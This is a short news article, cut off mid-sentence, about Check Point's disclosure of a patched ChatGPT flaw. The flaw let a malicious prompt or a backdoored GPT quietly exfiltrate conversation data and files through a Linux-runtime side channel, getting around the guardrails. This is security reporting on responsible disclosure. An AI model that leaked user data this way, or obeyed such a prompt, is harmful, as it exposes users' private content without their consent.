OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
Mar 30, 2026
Vulnerability / Enterprise Security
A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point. "A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content," the cybersecurity company said in a report published today. "A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent." Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context. While ChatGPT is built with various guardrails to prevent unauthorized data sharing or generate direct outbound network requests , the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel originating from the Linux runtime ...